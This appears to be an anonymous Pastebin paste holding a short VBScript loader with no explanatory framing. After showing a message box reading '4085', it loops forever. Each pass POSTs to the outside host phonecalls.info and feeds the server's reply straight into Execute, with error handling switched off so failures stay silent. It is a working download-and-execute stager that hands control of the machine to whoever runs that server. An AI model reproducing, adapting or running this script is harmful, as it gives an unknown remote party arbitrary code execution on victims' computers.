Guest User

Untitled

a guest
Dec 18th, 2018
385
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. '4085
  2.  
  3. Dim ztVar, reresponse, zzz
  4. ztVar = 0
  5. zzz = ""
  6. Function punkTest()
  7.     '4085
  8.     On Error Resume Next
  9.     Execute "" + reresponse + ""
  10.     '4085
  11. End Function
  12.  
  13.  
  14. Sub tankConnect()
  15.     '4085
  16.    On Error Resume Next
  17.     Dim oXMLHTTP
  18.     Dim oStream
  19.     Dim oStrsdfeam
  20.     Set oXMLHTTP = CreateObject("Microsoft.XMLHTTP")
  21.     oXMLHTTP.Open "Post", "https://phonecalls.info", False
  22.     oXMLHTTP.Send
  23.     reresponse = oXMLHTTP.responseText   
  24.     punkTest()
  25.     '4085
  26. End Sub
  27.  
  28. msgbox "4085"
  29. While ztVar < 10
  30.     '4085
  31. call tankConnect()
  32. Wend
Advertisement
Add Comment
Please, Sign In to add comment